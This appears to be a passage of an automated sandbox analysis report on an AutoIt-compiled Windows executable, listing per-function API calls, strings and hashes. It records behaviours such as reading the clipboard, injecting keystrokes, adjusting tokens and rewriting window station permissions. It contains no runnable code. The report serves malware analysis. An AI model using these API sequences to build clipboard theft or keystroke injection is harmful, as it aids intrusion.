                                                                                                                                                          • Opcode Fuzzy Hash: 3ee0fb3cdbe95a278269b4cbd41aea159fd2b4f831d8713cc621bb7894356947
                                                                                                                                                          • Instruction Fuzzy Hash: 64D05EA65002282FDB50E634AC0ADFB36ADC744104F0002A0786DD2042EA20AE8586F0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00166623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0016685E,?,?,?,00194A5C,001BE448,00000003,?,?), ref: 001666E2
                                                                                                                                                          • WriteFile.KERNEL32(?,?,001E22E8,00000000,00000000,?,?,?,00194A5C,001BE448,00000003,?,?,00124C44,?,?), ref: 0016686C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 539440098-0
                                                                                                                                                          • Opcode ID: ac80d351a51ece5858a638ad1ff1676339e944ea0930fdee76fbc98e33a7ec29
                                                                                                                                                          • Instruction ID: b9df1b6a51421ba8ed6eab1082e9aad81961c1d626f375f63595d3f10217fdfd
                                                                                                                                                          • Opcode Fuzzy Hash: ac80d351a51ece5858a638ad1ff1676339e944ea0930fdee76fbc98e33a7ec29
                                                                                                                                                          • Instruction Fuzzy Hash: 3CE04636000208BBDB20AF94EC01A8ABBBCEB04310F00451AF94191010D7B1AE149BA0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSendTimeout
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1599653421-0
                                                                                                                                                          • Opcode ID: c7d65c12d923912e425a4d4d8a805bc804d76a2944e752c8d17f059e3f5a622c
                                                                                                                                                          • Instruction ID: c6608953443ffcd5c6db9d43c4294815e2138e9551025470bb6074f2720c958e
                                                                                                                                                          • Opcode Fuzzy Hash: c7d65c12d923912e425a4d4d8a805bc804d76a2944e752c8d17f059e3f5a622c
                                                                                                                                                          • Instruction Fuzzy Hash: 81D012F16902087EFB008771DD07DBB775CD722F81F4046617E06D68D1D6649E498570
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015E3AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1777923405-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,001949DA,?,?,00000000), ref: 00124FC4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00195950), ref: 0012510C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0018AFDB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: %d/%02d/%02d
                                                                                                                                                          • API String ID: 3850602802-328681919
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 0013F796
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00194388
                                                                                                                                                          • IsIconic.USER32(000000FF), ref: 00194391
                                                                                                                                                          • ShowWindow.USER32(000000FF,00000009), ref: 0019439E
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 001943A8
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001943BE
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 001943C5
                                                                                                                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001943D1
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001943E2
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001943EA
                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 001943F2
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 001943F5
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019440A
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194415
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019441F
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194424
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019442D
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194432
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019443C
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194441
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00194444
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0019446B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                                                          • Opcode ID: edeee3ccc8b7586d247f15433596f3c64c6124e8ad88cc1f999e5d1f960c75fc
                                                                                                                                                          • Instruction ID: 068ddddace9013fff86a23e309706038a36a1e2618fda9ec7e91d0be986ce83b
                                                                                                                                                          • Opcode Fuzzy Hash: edeee3ccc8b7586d247f15433596f3c64c6124e8ad88cc1f999e5d1f960c75fc
                                                                                                                                                          • Instruction Fuzzy Hash: E4319271A40318BBEF206BB1AC49FBF3E6CEB45B54F114025FA06EA5D1D7B05D41AEA0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001E22E8,?,00000000,?,00123E2E,?,00000000,?,001BDBF0,00000000,?), ref: 0012BE8B
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00123E2E,?,00000000,?,001BDBF0,00000000,?,00000002), ref: 0012BEA7
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0012BF19
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012BF31
                                                                                                                                                          • _wcscat.LIBCMT ref: 0012BF46
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0012BF56
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012C03E
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012C1ED
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 0012C250
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 0012C320: _memmove.LIBCMT ref: 0012C419
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                                                          • API String ID: 2542276039-689609797
                                                                                                                                                          • Opcode ID: 3157f9cf321c6dd3dce5622fed96bfad8f3b20c9fe2357b2558d4f57c9325a9e
                                                                                                                                                          • Instruction ID: 3137e13da7f9880582f2456dfac7f11b49210e520bd18e48584dea2e9509b554
                                                                                                                                                          • Opcode Fuzzy Hash: 3157f9cf321c6dd3dce5622fed96bfad8f3b20c9fe2357b2558d4f57c9325a9e
                                                                                                                                                          • Instruction Fuzzy Hash: E842AE715083519FDB11EF60D881BAFB7E8AFA4300F00492DF59687252EB31EA59CB93
                                                                                                                                                          APIs
                                                                                                                                                          • OpenClipboard.USER32(001BDBF0), ref: 001770C3
                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 001770D1
                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 001770D9
                                                                                                                                                          • CloseClipboard.USER32 ref: 001770E5
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00177101
                                                                                                                                                          • CloseClipboard.USER32 ref: 0017710B
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00177120
                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0017712D
                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 00177135
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00177142
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00177176
                                                                                                                                                          • CloseClipboard.USER32 ref: 00177283
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3222323430-0
                                                                                                                                                          • Opcode ID: 87ab3e8190ff71aae7f7b5ed78522c8830efcd5ccc6d2eb709965712f2409636
                                                                                                                                                          • Instruction ID: 9e5beb73e4e054e50f408c28677b126c5015e1425bdbf142f569ef4c4b9f7d91
                                                                                                                                                          • Opcode Fuzzy Hash: 87ab3e8190ff71aae7f7b5ed78522c8830efcd5ccc6d2eb709965712f2409636
                                                                                                                                                          • Instruction Fuzzy Hash: AD51BF31208601ABD305FF60EC8AF7E77B8AF99B01F008519F55AD65E2EB70D944CB62
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015BF0F
                                                                                                                                                            • Part of subcall function 0015BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015BF3C
                                                                                                                                                            • Part of subcall function 0015BEC3: GetLastError.KERNEL32 ref: 0015BF49
                                                                                                                                                          • _memset.LIBCMT ref: 0015BA34
                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0015BA86
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015BA97
                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0015BAAE
                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 0015BAC7
                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 0015BAD1
                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0015BAEB
                                                                                                                                                            • Part of subcall function 0015B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0015B8C5
                                                                                                                                                            • Part of subcall function 0015B8B0: CloseHandle.KERNEL32(?), ref: 0015B8D7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                                                                          • Opcode ID: c8c355925d239d576c0e1d7fbe18273d2b6181800dc3adc7ba4b4061c7f3a9c4
                                                                                                                                                          • Instruction ID: f2d16dc190fdcd7a3c10bd29ba4f49e5a1d22f2438c043a4c5624d4e5c5d63da
                                                                                                                                                          • Opcode Fuzzy Hash: c8c355925d239d576c0e1d7fbe18273d2b6181800dc3adc7ba4b4061c7f3a9c4
                                                                                                                                                          • Instruction Fuzzy Hash: 6D8179B1804209EFDF119FA4DD85AEEBBB8EF09305F144119FD25AA161DB318E59DB20
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016FE03
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0016FE57
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016FE7C
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016FE93
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016FEBA
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF06
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF3F
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF93
                                                                                                                                                            • Part of subcall function 0014234B: __woutput_l.LIBCMT ref: 001423A4
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FFE1
                                                                                                                                                          • __swprintf.LIBCMT ref: 00170030
                                                                                                                                                          • __swprintf.LIBCMT ref: 0017007F
                                                                                                                                                          • __swprintf.LIBCMT ref: 001700CE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                          • API String ID: 108614129-2428617273
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00172065
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017207A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172091
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001720A3
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001720D5
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001720E0
                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001720FC
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172123
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017213A
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0017214C
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001D3A68), ref: 0017216A
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00172174
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172181
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172191
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Attributes
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 70642500-438819550
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0018F14B
                                                                                                                                                            • Part of subcall function 0018D5EE: ClientToScreen.USER32(?,?), ref: 0018D617
                                                                                                                                                            • Part of subcall function 0018D5EE: GetWindowRect.USER32(?,?), ref: 0018D68D
                                                                                                                                                            • Part of subcall function 0018D5EE: PtInRect.USER32(?,?,0018EB2C), ref: 0018D69D
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F1B4
                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0018F1BF
                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0018F1E2
                                                                                                                                                          • _wcscat.LIBCMT ref: 0018F212
                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0018F229
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F242
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F259
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F27B
                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0018F282
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0018F36D
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                          • API String ID: 2166380349-3440237614
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 001721C0
                                                                                                                                                          • _wcscmp.LIBCMT ref: 001721D5
                                                                                                                                                          • _wcscmp.LIBCMT ref: 001721EC
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0017221B
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172226
                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00172242
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172269
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172280
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00172292
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001D3A68), ref: 001722B0
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001722BA
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001722C7
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001722D7
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$Close$CurrentDirectoryFirstNext
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 4190467141-438819550
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove_memset
                                                                                                                                                          • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                          • API String ID: 3555123492-286096704
                                                                                                                                                          • Opcode ID: 6ab0b4c3009342b2e08f9bcf28bfcfaf08953870db3d894d6862ba4d7f2a3cbe
                                                                                                                                                          • Instruction ID: f13f1b602c3b4733cab2c393a7206eb34ad2587274348b2cfc17f8686980c399
                                                                                                                                                          • Opcode Fuzzy Hash: 6ab0b4c3009342b2e08f9bcf28bfcfaf08953870db3d894d6862ba4d7f2a3cbe
                                                                                                                                                          • Instruction Fuzzy Hash: 5072DD75E00229DFDF29CF98C9806ADB7B1FF49314F2581A9D855AB380E334AE90DB50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0018ED0C
                                                                                                                                                          • GetFocus.USER32 ref: 0018ED1C
                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0018ED27
                                                                                                                                                          • _memset.LIBCMT ref: 0018EE52
                                                                                                                                                          • GetMenuItemInfoW.USER32 ref: 0018EE7D
                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 0018EE9D
                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0018EEB0
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0018EEE4
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0018EF2C
                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0018EF64
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0018EF99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3616455698-4108050209
                                                                                                                                                          • Opcode ID: e5a494644d86d4f68728bbe60f21dd6ea0be6ac81d7eace2a832fc48695754f0
                                                                                                                                                          • Instruction ID: 37611e5d891847e9ee7564cff5fa0313934c33b229857b36a914c3470c3f7dd1
                                                                                                                                                          • Opcode Fuzzy Hash: e5a494644d86d4f68728bbe60f21dd6ea0be6ac81d7eace2a832fc48695754f0
                                                                                                                                                          • Instruction Fuzzy Hash: 7C818C71608301AFD714EF14D884AABBBE5FF89354F04092DFA99972A1D730DA45CFA2
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                            • Part of subcall function 0015B8E7: GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                            • Part of subcall function 0015B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                            • Part of subcall function 0015B8E7: RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                            • Part of subcall function 0015B982: GetProcessHeap.KERNEL32(00000008,0015B3E1,00000000,00000000,?,0015B3E1,?), ref: 0015B98E
                                                                                                                                                            • Part of subcall function 0015B982: RtlAllocateHeap.NTDLL(00000000,?,0015B3E1), ref: 0015B995
                                                                                                                                                            • Part of subcall function 0015B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015B3E1,?), ref: 0015B9A6
                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015B3FC
                                                                                                                                                          • _memset.LIBCMT ref: 0015B411
                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015B430
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B441
                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0015B47E
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015B49A
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B4B7
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015B4C6
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0015B4CD
                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015B4EE
                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 0015B4F5
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015B526
                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015B54C
                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015B560
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2347767575-0
                                                                                                                                                          • Opcode ID: c5c796e0249695d05e7ab5845ff949f7583054bbf16138e3b35c384e956ca24e
                                                                                                                                                          • Instruction ID: 80c4cbb64fa22fe0a5c740b6c6640a70774226608e76c02f07d9ab0dc5fbecde
                                                                                                                                                          • Opcode Fuzzy Hash: c5c796e0249695d05e7ab5845ff949f7583054bbf16138e3b35c384e956ca24e
                                                                                                                                                          • Instruction Fuzzy Hash: 77514D71900209EFDF14DFA4EC85AEEBB79FF05301F048119F926AB691E7359A49CB60
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00167B9F: __wsplitpath.LIBCMT ref: 00167BBC
                                                                                                                                                            • Part of subcall function 00167B9F: __wsplitpath.LIBCMT ref: 00167BCF
